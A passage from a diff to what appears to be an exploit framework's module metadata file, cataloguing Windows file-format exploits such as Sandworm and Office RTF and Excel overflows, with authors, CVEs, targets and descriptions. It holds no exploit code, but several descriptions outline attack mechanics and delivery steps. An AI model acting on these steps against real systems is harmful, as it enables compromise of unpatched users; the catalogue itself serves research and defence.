"exploit_windows/fileformat/microsoft_windows_contact": { + "name": "Microsoft Windows Contact File Format Arbitary Code Execution", + "fullname": "exploit/windows/fileformat/microsoft_windows_contact", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-01-17", + "type": "exploit", + "author": [ + "John Page (aka hyp3rlinx)", + "Brenner Little" + ], + "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.\n User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of \".contact\" files node param which takes an expected website value, however if an attacker references an\n executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.\n Executable files can live in a sub-directory so when the \".contact\" website link is clicked it traverses directories towards the executable and runs.\n Making matters worse is if the files are compressed then downloaded \"mark of the web\" (MOTW) may potentially not work as expected with certain archive utilitys.\n The \".\\\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.\n This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.", + "references": [ + "EDB-46188", + "URL-http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt", + "ZDI-19-013" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2022-12-04 17:41:24 +0000", + "path": "/modules/exploits/windows/fileformat/microsoft_windows_contact.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/microsoft_windows_contact", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/millenium_mp3_pls": { + "name": "Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/millenium_mp3_pls", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-07-30", + "type": "exploit", + "author": [ + "Molotov", + "dookie", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Millenium MP3 Studio.\n This functionality has not been tested in this module.", + "references": [ + "OSVDB-56574", + "EDB-9618", + "EDB-10240" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/millenium_mp3_pls.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/millenium_mp3_pls", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mini_stream_pls_bof": { + "name": "Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/mini_stream_pls_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-07-16", + "type": "exploit", + "author": [ + "Madjix", + "Tiago Henriques", + "James Fitts " + ], + "description": "This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3\n Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim\n opens the malicious PLS file.", + "references": [ + "CVE-2010-5081", + "OSVDB-78078", + "EDB-14373", + "BID-34514" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Mini-stream RM-MP3 Converter v3.1.2.1.2010.03.30" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mini_stream_pls_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mjm_coreplayer2011_s3m": { + "name": "MJM Core Player 2011 .s3m Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/mjm_coreplayer2011_s3m", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-04-30", + "type": "exploit", + "author": [ + "rick2600", + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in MJM Core Player 2011\n When opening a malicious s3m file in this application, a stack buffer overflow can be\n triggered, resulting in arbitrary code execution.\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.", + "references": [ + "OSVDB-72101", + "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-004" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal Generic DEP & ASLR Bypass" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mjm_coreplayer2011_s3m", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mjm_quickplayer_s3m": { + "name": "MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/mjm_quickplayer_s3m", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-04-30", + "type": "exploit", + "author": [ + "rick2600", + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in MJM QuickPlayer 1.00 beta 60a\n and QuickPlayer 2010 (Multi-target exploit). When opening a malicious s3m file in\n one of these 2 applications, a stack buffer overflow can be triggered, resulting in\n arbitrary code execution.\n\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.", + "references": [ + "OSVDB-72102", + "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-003" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal Generic DEP & ASLR Bypass" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mjm_quickplayer_s3m", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/moxa_mediadbplayback": { + "name": "MOXA MediaDBPlayback ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/fileformat/moxa_mediadbplayback", + "aliases": [], + "rank": 200, + "disclosure_date": "2010-10-19", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When\n sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2010-4742", + "OSVDB-68986", + "URL-http://www.moxa.com" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/moxa_mediadbplayback", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mplayer_m3u_bof": { + "name": "MPlayer Lite M3U Buffer Overflow", + "fullname": "exploit/windows/fileformat/mplayer_m3u_bof", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-03-19", + "type": "exploit", + "author": [ + "C4SS!0 and h1ch4m", + "Gabor Seljan" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n MPlayer Lite r33064, caused by improper bounds checking of an URL entry.\n\n By persuading the victim to open a specially-crafted .M3U file, specifically by\n drag-and-dropping it to the player, a remote attacker can execute arbitrary\n code on the system.", + "references": [ + "BID-46926", + "EDB-17013", + "URL-http://www.mplayer-ww.com/eng/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mplayer_m3u_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mplayer_sami_bof": { + "name": "MPlayer SAMI Subtitle File Buffer Overflow", + "fullname": "exploit/windows/fileformat/mplayer_sami_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-05-19", + "type": "exploit", + "author": [ + "Jacques Louw", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow found in the handling\n of SAMI subtitles files in MPlayer SVN Versions before 33471. It currently\n targets SMPlayer 0.6.8, which is distributed with a vulnerable version of MPlayer.\n\n The overflow is triggered when an unsuspecting victim opens a movie file first,\n followed by loading the malicious SAMI subtitles file from the GUI. Or, it can also\n be done from the console with the MPlayer \"-sub\" option.", + "references": [ + "BID-49149", + "OSVDB-74604", + "URL-http://labs.mwrinfosecurity.com/files/Advisories/mwri_mplayer-sami-subtitles_2011-08-12.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "SMPlayer 0.6.8 / mplayer.exe Sherpya-SVN-r29355-4.5.0 / Windows XP English SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mplayer_sami_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mplayer_sami_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms09_067_excel_featheader": { + "name": "MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability", + "fullname": "exploit/windows/fileformat/ms09_067_excel_featheader", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-11-10", + "type": "exploit", + "author": [ + "Sean Larsson", + "jduck " + ], + "description": "This module exploits a vulnerability in the handling of the FEATHEADER record\n by Microsoft Excel. Revisions of Office XP and later prior to the release of the\n MS09-067 bulletin are vulnerable.\n\n When processing a FEATHEADER (Shared Feature) record, Microsoft used a data\n structure from the file to calculate a pointer offset without doing proper\n validation. Attacker supplied data is then used to calculate the location of an\n object, and in turn a virtual function call. This results in arbitrary code\n execution.\n\n NOTE: On some versions of Office, the user will need to dismiss a warning dialog\n prior to the payload executing.", + "references": [ + "CVE-2009-3129", + "OSVDB-59860", + "MSB-MS09-067", + "BID-36945", + "ZDI-09-083", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=832" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office 2002 (XP) SP3 base English on Windows XP SP3 English", + "Microsoft Office 2002 (XP) SP3 w/kb969680 English on Windows XP SP3 English", + "Microsoft Office 2003 SP0 English on Windows XP SP3 English", + "Microsoft Office 2007 SP2 English on Windows XP SP3 English", + "Crash Target for Debugging" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms09_067_excel_featheader", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms10_004_textbytesatom": { + "name": "MS10-004 Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/ms10_004_textbytesatom", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-02-09", + "type": "exploit", + "author": [ + "SkD", + "Snake", + "jduck " + ], + "description": "This module exploits a stack buffer overflow vulnerability in the handling of\n the TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft,\n the PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as\n Office 2004 for Mac, are vulnerable.\n\n NOTE: The vulnerable code path is not reachable on versions of Windows prior to\n Windows Vista.", + "references": [ + "CVE-2010-0033", + "OSVDB-62241", + "MSB-MS10-004", + "ZDI-10-017" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft PowerPoint Viewer 2003", + "Microsoft PowerPoint Viewer 2003 (kb949041 or kb956500) or Office 2003 SP3", + "Microsoft PowerPoint Viewer 2003 (kb969615)", + "Crash Target for Debugging" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms10_004_textbytesatom", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms10_038_excel_obj_bof": { + "name": "MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow", + "fullname": "exploit/windows/fileformat/ms10_038_excel_obj_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-06-08", + "type": "exploit", + "author": [ + "Nicolas Joly", + "Shahin Ramezany ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP.\n By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker\n can get the control of the execution flow. This results in arbitrary code execution under\n the context of the user.", + "references": [ + "CVE-2010-0822", + "OSVDB-65236", + "BID-40520", + "MSB-MS10-038", + "URL-https://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office Excel 2002 10.2614.2625 Service Pack 0(Office XP) on Windows XP SP3", + "Microsoft Office Excel 2002 10.6501.6626 Service Pack 3 (Office XP SP3) on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms10_038_excel_obj_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms10_087_rtf_pfragments_bof": { + "name": "MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)", + "fullname": "exploit/windows/fileformat/ms10_087_rtf_pfragments_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-11-09", + "type": "exploit", + "author": [ + "wushi of team509", + "unknown", + "jduck ", + "DJ Manila Ice, Vesh, CA" + ], + "description": "This module exploits a stack-based buffer overflow in the handling of the\n 'pFragments' shape property within the Microsoft Word RTF parser. All versions\n of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the\n MS10-087 bulletin are vulnerable.\n\n This module does not attempt to exploit the vulnerability via Microsoft Outlook.\n\n The Microsoft Word RTF parser was only used by default in versions of Microsoft\n Word itself prior to Office 2007. With the release of Office 2007, Microsoft\n began using the Word RTF parser, by default, to handle rich-text messages within\n Outlook as well. It was possible to configure Outlook 2003 and earlier to use\n the Microsoft Word engine too, but it was not a default setting.\n\n It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that\n Microsoft will confirm or deny this since Office 2000 has reached its support\n cycle end-of-life.", + "references": [ + "CVE-2010-3333", + "OSVDB-69085", + "MSB-MS10-087", + "BID-44652", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Microsoft Office 2002 SP3 English on Windows XP SP3 English", + "Microsoft Office 2003 SP3 English on Windows XP SP3 English", + "Microsoft Office 2007 SP0 English on Windows XP SP3 English", + "Microsoft Office 2007 SP0 English on Windows Vista SP0 English", + "Microsoft Office 2007 SP0 English on Windows 7 SP0 English", + "Crash Target for Debugging" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms10_087_rtf_pfragments_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms11_006_createsizeddibsection": { + "name": "MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/ms11_006_createsizeddibsection", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-12-15", + "type": "exploit", + "author": [ + "Moti & Xu Hao", + "Yaniv Miron aka Lament of ilhack", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in the handling of thumbnails\n within .MIC files and various Office documents. When processing a thumbnail bitmap\n containing a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This\n leads to arbitrary code execution.\n\n In order to trigger the vulnerable code, the folder containing the document must be\n viewed using the \"Thumbnails\" view.", + "references": [ + "CVE-2010-3970", + "OSVDB-70263", + "MSB-MS11-006", + "BID-45662" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 SP0/SP4 English", + "Windows XP SP3 English", + "Crash Target for Debugging" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms11_006_createsizeddibsection", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms11_021_xlb_bof": { + "name": "MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow", + "fullname": "exploit/windows/fileformat/ms11_021_xlb_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-08-09", + "type": "exploit", + "author": [ + "Aniway", + "Unknown", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in Excel of Microsoft Office 2007.\n By supplying a malformed .xlb file, an attacker can control the content (source)\n of a memcpy routine, and the number of bytes to copy, therefore causing a stack-\n based buffer overflow. This results in arbitrary code execution under the context of\n the user.", + "references": [ + "CVE-2011-0105", + "OSVDB-71765", + "MSB-MS11-021", + "ZDI-11-121" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office Excel 2007 on Windows XP", + "Microsoft Office Excel 2007 SP2 on Windows XP" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms11_021_xlb_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms12_005": { + "name": "MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability", + "fullname": "exploit/windows/fileformat/ms12_005", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-01-10", + "type": "exploit", + "author": [ + "Yorick Koster", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Microsoft Office's ClickOnce\n feature. When handling a Macro document, the application fails to recognize\n certain file extensions as dangerous executables, which can be used to bypass\n the warning message. This can allow attackers to trick victims into opening the\n malicious document, which will load up either a python or ruby payload, and\n finally, download and execute an executable.", + "references": [ + "CVE-2012-0013", + "OSVDB-78207", + "MSB-MS12-005", + "BID-51284", + "URL-http://support.microsoft.com/default.aspx?scid=kb;EN-US;2584146", + "URL-http://exploitshop.wordpress.com/2012/01/14/ms12-005-embedded-object-package-allow-arbitrary-code-execution/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office Word 2007/2010 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms12_005.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms12_005", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms12_027_mscomctl_bof": { + "name": "MS12-027 MSCOMCTL ActiveX Buffer Overflow", + "fullname": "exploit/windows/fileformat/ms12_027_mscomctl_bof", + "aliases": [], + "rank": 200, + "disclosure_date": "2012-04-10", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious\n RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited\n in the wild on April 2012.\n\n This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office\n 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses\n \"msgr3en.dll\", which will load after office got load, so the malicious file must\n be loaded through \"File / Open\" to achieve exploitation.", + "references": [ + "CVE-2012-0158", + "OSVDB-81125", + "BID-52911", + "MSB-MS12-027", + "URL-http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English", + "Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms12_027_mscomctl_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms13_071_theme": { + "name": "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution", + "fullname": "exploit/windows/fileformat/ms13_071_theme", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-09-10", + "type": "exploit", + "author": [ + "Eduardo Prado", + "juan vazquez ", + "Matthew Hall " + ], + "description": "This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows\n 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot]\n section. An arbitrary path can be used as screen saver, including a remote SMB resource,\n which allows for remote code execution when a malicious .theme file is opened, and the\n \"Screen Saver\" tab is viewed. The code execution is also triggered if the victim installs\n the malicious theme and stays away from the computer, when Windows tries to display the\n screensaver.", + "references": [ + "CVE-2013-0810", + "OSVDB-97136", + "MSB-MS13-071", + "BID-62176", + "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=1040", + "URL-https://www.rapid7.com/blog/post/2013/09/25/change-the-theme-get-a-shell" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 / Windows 2003 SP2" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/fileformat/ms13_071_theme.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms13_071_theme", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms14_017_rtf": { + "name": "MS14-017 Microsoft Word RTF Object Confusion", + "fullname": "exploit/windows/fileformat/ms14_017_rtf", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-04-01", + "type": "exploit", + "author": [ + "Haifei Li", + "Spencer McIntyre", + "unknown" + ], + "description": "This module creates a malicious RTF file that when opened in\n vulnerable versions of Microsoft Word will lead to code execution.\n The flaw exists in how a listoverridecount field can be modified\n to treat one structure as another.\n\n This bug was originally seen being exploited in the wild starting\n in April 2014. This module was created by reversing a public\n malware sample.", + "references": [ + "CVE-2014-1761", + "MSB-MS14-017", + "URL-http://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers", + "URL-https://www.virustotal.com/en/file/e378eef9f4ea1511aa5e368cb0e52a8a68995000b8b1e6207717d9ed09e8555a/analysis/" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office 2010 SP2 English on Windows 7 SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms14_017_rtf.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms14_017_rtf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "screen-effects" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms14_060_sandworm": { + "name": "MS14-060 Microsoft Windows OLE Package Manager Code Execution", + "fullname": "exploit/windows/fileformat/ms14_060_sandworm", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-10-14", + "type": "exploit", + "author": [ + "Unknown", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)\n allowing arbitrary code execution, publicly known as \"Sandworm\". Platforms such as Windows\n Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be\n vulnerable. However, based on our testing, the most reliable setup is on Windows platforms\n running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such\n as using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to\n a failure in the CPackage::CreateTempFileName function.\n\n This module will generate three files: an INF, a GIF, and a PPSX file. You are required to\n set up a SMB or Samba 3 server and host the INF and GIF there. Systems such as Ubuntu or an\n older version of Windows (such as XP) work best for this because they require little\n configuration to get going. The PPSX file is what you should send to your target.\n\n In detail, the vulnerability has to do with how the Object Packager 2 component\n (packager.dll) handles an INF file that contains malicious registry changes, which may be\n leveraged for code execution. First of all, Packager does not load the INF file directly.\n As an attacker, you can trick it to load your INF anyway by embedding the file path as\n a remote share in an OLE object. The packager will then treat it as a type of media file,\n and load it with the packager!CPackage::OLE2MPlayerReadFromStream function, which will\n download it with a CopyFileW call, save it in a temp folder, and pass that information for\n later. The exploit will do this loading process twice: first for a fake gif file that's\n actually the payload, and the second for the INF file.\n\n The packager will also look at each OLE object's XML Presentation Command, specifically the\n type and cmd property. In the exploit, \"verb\" media command type is used, and this triggers\n the packager!CPackage::DoVerb function. Also, \"-3\" is used as the fake gif file's cmd\n property, and \"3\" is used for the INF. When the cmd is \"-3\", DoVerb will bail. But when \"3\"\n is used (again, for the INF file), it will cause the packager to try to find appropriate\n handler for it, which will end up with C:\\Windows\\System32\\infDefaultInstall.exe, and that\n will install/run the malicious INF file, and finally give us arbitrary code execution.", + "references": [ + "CVE-2014-4114", + "OSVDB-113140", + "MSB-MS14-060", + "BID-70419", + "URL-http://www.isightpartners.com/2014/10/cve-2014-4114/", + "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 SP1 / Office 2010 SP2 / Office 2013" + ], + "mod_time": "2023-03-13 10:31:27 +0000", + "path": "/modules/exploits/windows/fileformat/ms14_060_sandworm.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms14_060_sandworm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [], + "AKA": [ + "sandworm" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms14_064_packager_python": { + "name": "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python", + "fullname": "exploit/windows/fileformat/ms14_064_packager_python", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-11-12", + "type": "exploit", + "author": [ + "Haifei Li", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)\n allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability\n publicly known as \"Sandworm\", on systems with Python for Windows installed. Windows Vista\n SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.\n However, based on our testing, the most reliable setup is on Windows platforms running\n Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as\n those using Office 2010 SP1 may be less stable, and may end up with a crash due to a\n failure in the CPackage::CreateTempFileName function.", + "references": [ + "CVE-2014-6352", + "MSB-MS14-064", + "BID-70690", + "URL-http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm" + ], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013" + ], + "mod_time": "2022-03-10 18:03:35 +0000", + "path": "/modules/exploits/windows/fileformat/ms14_064_packager_python.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms14_064_packager_python", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms14_064_packager_run_as_admin": { + "name": "MS14-064 Microsoft Windows OLE Package Manager Code Execution", + "fullname": "exploit/windows/fileformat/ms14_064_packager_run_as_admin", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-10-21", + "type": "exploit", + "author": [ + "Haifei Li", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in Windows Object Linking and 